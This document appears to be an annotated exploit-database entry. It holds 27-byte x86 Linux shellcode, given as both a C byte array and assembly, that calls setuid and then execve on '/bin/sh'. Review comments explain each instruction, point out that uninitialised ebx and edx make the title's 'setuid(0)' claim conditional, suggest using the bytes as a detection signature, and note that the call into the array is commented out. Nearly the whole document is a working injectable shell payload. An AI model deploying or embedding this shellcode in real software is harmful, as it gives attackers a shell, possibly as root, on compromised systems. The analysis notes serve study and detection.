27-byte GNU/Linux x86 (32-bit, int 0x80) shellcode: setuid(0) && execve("/bin/sh",0,0), containing no NUL bytes.
c0c0138eb0cbf63e6e3e5b1a04fffbf8501663ccd3ea72f3924bcf3011fe0535
-----------[ C Source Code ]-----------
/*
Smallest GNU/Linux x86 setuid(0) && execve("/bin/sh",0,0) Shellcode
without NULLs
Coded by Chema Garcia (aka sch3m4)
+ sch3m4@opensec.es
+ http://opensec.es
Shellcode Size: 27 bytes
Date: 13/11/2008
*/
#include <stdio.h>
/*
 * 27-byte i386 Linux payload using the int 0x80 convention (eax = system
 * call number, ebx/ecx/edx = first three arguments). It issues two system
 * calls: number 0x17 (setuid) and number 0x0b (execve) on a path string
 * built on the stack, "//bin/sh".
 *
 * NOTE(review): ebx is not written before the first int 80h and edx is
 * never written, so the uid handed to setuid and the envp handed to execve
 * are whatever those registers held on entry. The "setuid(0)" and the last
 * ",0" in the title describe the zeroed-register case only.
 *
 * For analysts: none of the 27 bytes is 0x00, and the two push immediates
 * carry the ASCII fragments "n/sh" and "//bi" unencoded, so the array can
 * be matched as a plain byte signature.
 */
const char shellcode[]= "\x31\xC0" //xor eax,eax        ; eax = 0
"\x31\xC9" //xor ecx,ecx        ; ecx = 0 (string terminator, later execve argv)
"\xB0\x17" //mov al,17h         ; eax = 0x17, the i386 setuid number
"\x60" //pusha                  ; save all registers across the call
"\xCD\x80" //int 80h            ; first system call (setuid)
"\x61" //popa                   ; restore registers; eax is 0x17 again, return value dropped
"\x51" //push ecx               ; four zero bytes terminate the path string
"\x68\x6E\x2F\x73\x68" //push 0x68732f6e   ; bytes "n/sh" in memory order
"\x68\x2F\x2F\x62\x69" //push 0x69622f2f   ; bytes "//bi"; stack now reads "//bin/sh\0"
"\x89\xE3" //mov ebx, esp       ; ebx = address of the path string
"\xB0\x0B" //mov al,0xb         ; eax = 0x0b, the i386 execve number (upper bytes already 0)
"\xCD\x80"; //int 0x80          ; second system call (execve)
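/*
 * Prints the banner and the length of the byte array.
 * Control is never transferred to the array: the call is commented out.
 *
 * Returns 0.
 */
int main(void)
{
    /*
     * sizeof counts the implicit terminating NUL of the string literal,
     * hence the -1. The result is a size_t, so it is printed with %zu;
     * the published %d did not match the argument type, which is
     * undefined behaviour. The banner's first literal was also split
     * across two source lines, which does not compile; it is rejoined
     * here as two adjacent literals.
     */
    printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) "
           "Shellcode without NULLs"
           "\n\nCoded by Chema Garcia (aka sch3m4)"
           "\n\t + sch3m4@opensec.es"
           "\n\t + http://opensec.es"
           "\n\n[+] Shellcode Size: %zu bytes\n\n", sizeof(shellcode) - 1);

    /* Left commented out, as published, so building and running this
     * file only prints the length. */
    //(*(void (*)()) shellcode)();
    return 0;
}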
-----------[/ C Source Code ]-----------
-----------[ ASM Source Code ]-----------
; i386 Linux, int 0x80 convention: eax = system call number,
; ebx/ecx/edx = first three arguments.
; Two system calls are issued: 0x17 (setuid) and 0x0b (execve) on the
; stack string "//bin/sh".
; NOTE(review): ebx is not written before the first int 80h and edx is
; never written, so the setuid argument and the execve envp argument are
; whatever those registers held on entry.
global _start
section .text
_start:
xor eax,eax ; eax = 0
xor ecx,ecx ; ecx = 0 (string terminator, later the execve argv argument)
mov al,17h ; eax = 0x17, the i386 setuid number
pusha ; save all registers across the system call
int 80h ;setuid
popa ; restore registers; eax is 0x17 again, the return value is dropped
push ecx ; four zero bytes terminate the path string
push 0x68732f6e ; bytes "n/sh" in memory order
push 0x69622f2f ; bytes "//bi"; the stack now reads "//bin/sh",0
mov ebx, esp ; ebx = address of the path string
mov al,0xb ; eax = 0x0b, the i386 execve number (upper bytes already 0)
int 0x80;execve
-----------[/ ASM Source Code ]-----------
Greetings,
Chema García